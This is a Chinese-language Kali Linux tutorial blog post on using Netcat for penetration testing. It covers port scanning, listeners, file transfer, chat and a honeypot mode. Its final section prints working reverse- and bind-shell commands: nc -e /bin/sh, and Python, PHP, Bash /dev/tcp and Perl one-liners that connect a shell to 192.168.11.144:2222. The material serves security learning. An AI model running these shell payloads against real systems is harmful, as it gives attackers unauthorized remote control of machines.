c段主机及端口扫描工具_Kali Linux实战篇:Netcat“瑞士军刀”网络安全工具实战...

本文介绍了Netcat在渗透测试中的应用,包括端口扫描、监听、反向shell等,并提供了多种场景下的命令示例,如FTP匿名探测、文件传输和简易聊天功能。

1ec1e3932b114f10ba3e6f4bb0b146f7.png

前言

最近在做渗透测试的时候遇到了端口监听和shell的反弹问题,在这个过程中自己对Netcat这一款神器有了新的认识,现将一些Netcat的用法做一个小总结,希望对各位有帮助!

Netcat简介

Netcat是一款非常出名的网络工具,简称“NC”,有渗透测试中的“瑞士军刀”之称。它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。总之功能强大,可以用一句较为风趣的话来描述NC的强大——“你的想象力是局限NC的瓶颈”。

Netcat选项参数说明

8eaead11440a8ce6b355bf5328810d3c.png

功能说明:端口扫描、端口监听、远程文件传输、远程shell等等;

语  法:nc [-hlnruz][-g][-G][-i][-o][-p][-s][-v...][-w][主机名称][通信端口...]

参  数:

-g 设置路由器跃程通信网关,最多可设置8个;

 -G 设置来源路由指向器,其数值为4的倍数;

 -h 在线帮助; 

-i 设置时间间隔,以便传送信息及扫描通信端口;

 -l 使用监听模式,管控传入的资料;

 -n 直接使用IP地址,而不通过域名服务器;

 -o 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;

 -p 设置本地主机使用的通信端口;

 -r 乱数指定本地与远端主机的通信端口;

 -s 设置本地主机送出数据包的IP地址;

 -u 使用UDP传输协议;

 -v 显示指令执行过程;

 -w 设置等待连线的时间;

 -z 使用0输入/输出模式,只在扫描通信端口时使用。

Netcat简易使用

连接到远程主机

命令:nc  -nvv Targert_IP  Targert_Port

b5cfac361ba778a34d5271d5378ef859.png

监听本地主机

命令:nc  -l  -p  Local_Port

b849c56a9bf8cf1de074f850375a614a.png

端口扫描

扫描指定主机的单一端口是否开放

格式:nc  -v  target_IP  target_Port

cc3829cd46bd5a964816fcca1fc7d32f.png

扫描指定主机的某个端口段的端口开放信息

格式:nc  -v  -z  Target_IP   Target_Port_Start  -  Target_Port_End

173db1f6b7d85986aa3d76bb737dedde.png

扫描指定主机的某个UDP端口段,并且返回端口信息

格式:nc -v   -z  -u  Target_IP  Target_Port_Start   -   Target_Port_End

263069203db655a961036fadec631322.png

扫描指定主机的端口段信息,并且设置超时时间为3秒

格式:nc  -vv(-v) -z  -w  time  Target_IP   Target_Port_Start-Targert_Port_End

fde6b0f146e869918aa8beb3ed56bd14.png

端口监听

监听本地端口

格式:nc  -l  -p  local_Port

1adfb83e654302c1c25236d877f2c2d5.png

59da0bf6833f75ff535886a055fcb98c.png

471080098b68fb7754b6d6466ce2dfe9.png

注:先设置监听(不能出现端口冲突),之后如果有外来访问则输出该详细信息到命令行

监听本地端口,并且将监听到的信息保存到指定的文件中

格式:nc -l  -p local_Port > target_File

936917e5a85c1f1ef1116e553e009a0a.png

f1ed4ac7191eb43d91e647b3b4f52d14.png

90d4e732622a70c980fbbac3ce634daa.png

连接远程系统

格式:nc Target_IP  Target_Port

0b6ea4c307d7d5d13dde7c2b66c7fdf1.png

之后可以运行HTTP请求

ee974d09faaf53a9b68944e0b3de1506.png

FTP匿名探测

格式:nc Targert_IP  21

bb4511cb35f10298464b57c68e0b6a2d.png

文件传输

传输端:

格式:nc  Targert_IP  Targert_Port  <  Targert_File

59f2e9844676785b08cd174e4eb4c334.png

c48710ac27f2433e428e235d1aa6c3c7.png

接收端:

格式:nc   -l  Local_Port  >  Targert_File

a58f3ace732b9e7bdf1471c255a0869e.png

f1c441b0d80146de2de9d33d36459d13.png

简易聊天

本地主机

命令:nc   -l   8888

ddb5504b204baebdca05d2be7348c87c.png

远程主机

命令:nc Targert_IP    Targert_Port

99275ab419e53120cdd34e5144fff8a6.png

蜜罐

作为蜜罐使用1:

命令:nc -L -p  Port

注:使用“-L”参数可以不停的监听某一个端口,知道Ctrl+C为止

作为蜜罐使用2:

命令:nc -L -p  Port >log.txt

注:使用“-L”参数可以不停的监听某一个端口,知道Ctrl+C为止,同时把结果输出到log.txt文件中,如果把“>”改为“>>”即追加到文件之后。

这一个命令参数“-L”在Windows中有,现在的Linux中是没有这个选项的,但是自己可以去找找,这里只是想到了之前的这个使用,所以提出来简单介绍一下!

获取shell

简述:获取shell分为两种,一种是正向shell,一种是方向shell。如果客户端连接服务器端,想要获取服务器端的shell,那么称为正向shell,如果是客户端连接服务器,服务器端想要获取客户端的shell,那么称为反向shell

正向shell

本地主机:

命令:nc   Targert_IP  Targert_Port

b54ffaf829f2d0dcb8f11884f37cf03a.png

目标主机:

命令:nc  -lvp  Targert_Port   -e  /bin/sh  

48941f0252a9e203c5b0b6768246f3e6.png

反向shell

本地主机:

命令:nc -lvp  Target_Port

00a49559113f1c76185564acea503e2d.png

目标主机:

命令:nc  Targert_IP Targert_Port  -e /bin/sh

5f11095a88053a3c581ece2f8cf4424b.png

特殊情况——目标主机上没有Netcat,如何获取反向shell

在一般情况下,目标主机上一般都是不会有Netcat的,此时就需要使用其他替代的方法来实现反向链接达到攻击主机的目的,下面简单的介绍几种反向shell的设置。

python反向shell

目标主机端执行语句:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.144",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

本地主机

19216eb494b3d84ee4fc5d15228e08e8.png

目标主机

48573103463a51d9fac5b21e4611d67a.png

PHP反向shell

目标主机端执行语句:

php -r '$sock=fsockopen("192.168.11.144",2222);exec("/bin/sh -i &3 2>&3");'

本地主机:

bfbf20cca25a86a1e975f0a8c9103eba.png

目标主机:

48c43943b0c8c06ce4912fd791469e5f.png

Bash反向shell

目标主机端执行语句:

bash -i>&/dev/tcp/192.168.11.144/2222 0>&1

本地主机:

de7f3935d8805ba57ef1d7e09c3a24e5.png

目标主机:

8ef8d3f5b2edf063e21dad08cdebbd92.png

Perl反向shell

目标主机端执行语句:

perl -e 'use Socket;$i="192.168.11.144";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

本地主机

999c40e069987da84526fa134071f729.png

目标主机

44ec3ff9a4d985a4be016e1925f99577.png


学习更多白帽子网络攻防与编程好课,可点击【阅读原文】前往!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值